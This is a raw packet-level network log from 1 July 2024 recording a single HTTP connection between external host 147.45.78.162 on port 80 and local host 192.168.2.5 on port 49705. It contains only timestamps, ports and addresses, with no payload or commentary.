Jul 1, 2024 13:02:13.282161951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.282197952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.283220053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283256054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283281088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283291101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.283318043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.283471107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283497095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283513069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283521891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.283538103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.283550024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.283850908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283859968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.283893108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.305509090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305675030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305686951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305740118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.305751085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305762053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305773020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305782080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.305792093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.305816889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.305841923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.306241989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.306287050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.312319994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312402010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312413931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312422037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.312454939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.312705994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312716961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312726974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312736988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.312762976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.312783957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.315943003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.315987110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.315996885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.316036940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.316214085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.316224098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.316234112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.316241980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.316251040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.316282034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.316313028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.316706896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.316756010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.327030897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327090025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327100992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327172995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.327344894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327356100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327367067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327373981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.327383995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.327404022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.327435017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.331697941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.331780910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.331792116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.331804037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.331832886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.331850052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.332014084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.332056999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.332065105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.332073927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.332092047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.332108974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.332448959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.332494974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.336133957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336169004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336180925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336210012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.336230993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.336366892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336405039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.336453915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336463928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336474895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336502075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.336512089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.336518049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.336550951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.341190100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341263056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341272116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341284037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.341305971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.341347933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.341460943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341471910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341481924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341492891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.341504097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.341536045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.341978073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.342029095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.345093012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345165014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345172882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.345182896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345206022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.345221996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.345361948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345400095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.345508099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345521927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345532894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345542908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.345554113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.345577955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.347731113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.347740889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.347750902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.347800970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.347824097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.347906113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.347915888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.347946882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.348109007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.348119020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.348129988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.348140955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.348170996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.350289106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350347042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.350368023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350378036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350409031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.350555897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350591898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.350600004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350610018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350631952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.350650072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.350905895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.350944996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.352694035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.352768898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.352798939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.352808952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.352838993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.352854013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.353034019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.353044987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.353054047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.353065014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.353075027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.353111982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.354506969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.354573965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.354583979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.354593992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.354624033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.354793072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.354801893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.354830980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.354995966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.355006933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.355032921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.355060101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.358479977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358495951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358509064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358571053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.358599901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.358944893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358957052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358967066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358978033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.358999968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359029055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359608889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359672070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359694958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359705925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359735966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359746933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359929085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359940052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359951973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359962940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359967947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.359981060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.359997034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.360011101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376230001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376276970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376303911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376315117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376339912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376352072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376452923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376466990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376478910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376494884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376516104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376522064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376899958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376948118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.376949072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.376995087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.377827883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.377872944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.377882957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.377913952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.377923012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.377948999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.378074884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.378108025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.378110886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.378143072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.378148079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.378180981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.378463030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.378547907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.378557920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.378588915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400343895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400418997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400454044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400497913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400511980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400559902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400702000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400736094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400752068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400768995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400775909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400803089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.400806904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.400849104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.406791925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.406850100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.406862974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.406883955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.406892061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.406924963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.407001972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.407037973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.407040119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.407072067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.407077074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.407135963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.407474995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.407509089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.407515049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.407548904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.410568953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.410621881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.410687923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.410722017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.410741091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.410768032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.410969019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.411015987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.411024094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.411062002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.411173105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.411207914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.411266088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.423978090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424031019 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.424103975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424139023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424145937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.424182892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.424320936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424385071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.424428940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424463034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424470901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.424499035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.424746990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.424791098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.426476002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.426548958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.426563978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.426598072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.426611900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.426639080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.426795006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.426831007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.426845074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.426866055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.427073002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.427107096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.427115917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.427140951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.427146912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.427181005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.430831909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.430887938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.430903912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.430921078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.430936098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.431000948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.431034088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.431085110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.431087017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.431133032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.431314945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.431349039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.431360006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.431381941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.431391001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.431422949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.435992956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436049938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436060905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.436084032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436094046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.436122894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.436285973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436321020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436333895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.436353922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436358929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.436388969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.436393023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.436429024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.439640045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.439692974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.439707041 CEST	80	49705	147.45.78.162	192.168.2.5
